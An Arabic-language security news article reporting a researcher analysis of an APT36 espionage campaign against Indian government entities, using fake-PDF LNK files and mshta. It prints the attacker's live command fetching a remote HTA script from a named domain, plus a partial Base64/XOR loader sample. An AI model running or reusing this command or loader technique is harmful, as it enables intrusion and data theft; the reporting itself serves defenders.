كشفت تقارير أمنية حديثة عن حملة تجسس إلكتروني جديدة تنفذها مجموعة APT36، المعروفة أيضاً باسم Transparent Tribe، تستهدف بشكل خاص الكيانات الحكومية والاستراتيجية في الهند. تستخدم هذه الحملة المتطورة ملفات اختصار Windows LNK المعدة خصيصاً لغرض الهجوم، مما يثير قلقاً بشأن أمن البيانات الحساسة.
تتمثل نقطة البداية في رسائل بريد إلكتروني مزيفة يتم إرسالها باستهداف دقيق، تحتوي على أرشيف ZIP باسم “Online JLPT Exam Dec 2025.zip”. تهدف هذه التسمية إلى خداع المسؤولين وجعلهم يعتقدون أنهم يتعاملون مع إعلان امتحان رسمي، مما يشجعهم على فتح الملف المرفق.
حملة APT36 تستغل ملفات LNK للتجسس على الهند
بعد فك ضغط الأرشيف، يظهر للمستخدم ملف باسم “Online JLPT Exam Dec 2025.pdf”. على الرغم من مظهره كمستند PDF عادي، إلا أنه في الواقع ملف اختصار (shortcut file) تم التلاعب به. تستخدم هذه الحيلة امتداداً مزدوجاً (.pdf.lnk) ، حيث يخفي نظام Windows الجزء الأخير (.lnk)، مما يجعله يبدو كمستند PDF عادي حتى للمستخدمين الذين يعرضون امتدادات الملفات.
من الأمور اللافتة للنظر هو أن حجم الملف يتجاوز 2 ميجابايت، وهو حجم غير معتاد لملف اختصار، ويقترب من حجم مستند PDF حقيقي. وقد كشف محللون من شركة Cyfirma أن هذا الحجم الإضافي يأتي من تضمين هيكل PDF كامل وصور متعددة داخل ملف LNK لإضفاء المصداقية.
آلية الإصابة وسلسلة تنفيذ LNK
وفقاً للباحثين في Cyfirma، فإن هذه الحملة مصممة للتجسس طويل الأمد، حيث تمنح المهاجمين القدرة على التحكم عن بعد، وسرقة البيانات، وتنفيذ عمليات مراقبة شاملة من خلال برمجية خبيثة من نوع “حصان طروادة للوصول عن بعد” (RAT) تعتمد على .NET.
يتم تشغيل البرمجية الخبيثة في الذاكرة، وتعتمد على أدوات Windows الموثوقة، وتتواصل مع خادم القيادة والتحكم عبر قنوات مشفرة، مما يجعل اكتشافها وتتبعها أمراً صعباً على أدوات الأمن التقليدية. هذا يزيد من فعالية حملة APT36.
عندما يقوم الضحية بفتح ملف الاختصار المزيف الذي يظهر كـ PDF، يقوم نظام Windows بتشغيل برنامج mshta.exe من مجلد System32، ويمرر إليه نصاً برمجياً عن بعد (HTA script) كمعامل، بدلاً من فتح مستند.
وقد أظهر فحص قامت به Cyfirma لملف الاختصار أن المسار المستهدف يستدعي برنامج تحميل عن بعد موجود على الرابط: innlive.in.
mshta.exe "https://innlive.in/assets/public/01/jlp/jip.hta"يتم تشغيل النص البرمجي HTA في نافذة مخفية، ويتم تصغير إطار المتصفح إلى الصفر. بعد ذلك، يستخدم البرنامج روتينات تشفير مخصصة (Base64 و XOR) لفك تشفير قطعتي حمولة رئيسيتين في الذاكرة، تسمى ReadOnly و WriteOnly. تم الكشف عن أن هذا الهجوم يستهدف الجهات الحكومية في الهند.
تُظهر عينة من منطق JavaScript أن هذا النمط يتم اتباعه:
function CDDownload(s){ /* base64 decode logic */ }
function ProcessSignal(str,k){ /* XOR loop */ }
var ReadOnly = USBContents(SyncDataToCD("HxgVCQYKYhx4Z2dAdEAKRQ4bC..."));يقوم ReadOnly بإضعاف فحوصات أمان .NET وتعيين بيئة التشغيل، بينما تقوم WriteOnly بتحميل ملف DLL مشفر كـ RAT مباشرة في الذاكرة. يبدو أن مجلد “usb” مخفي، ويحتوي على ملف usbsyn.pim، الذي قد يخزن بيانات مشفرة إضافية للمراحل اللاحقة. وللمحافظة على هدوء المستخدم، يقوم HTA بجلب وفتح مستند PDF حقيقي لامتحان JLPT، بحيث تبدو العملية كاملة كعرض مستند عادي بينما يكون النظام قد تعرض للاختراق بالفعل.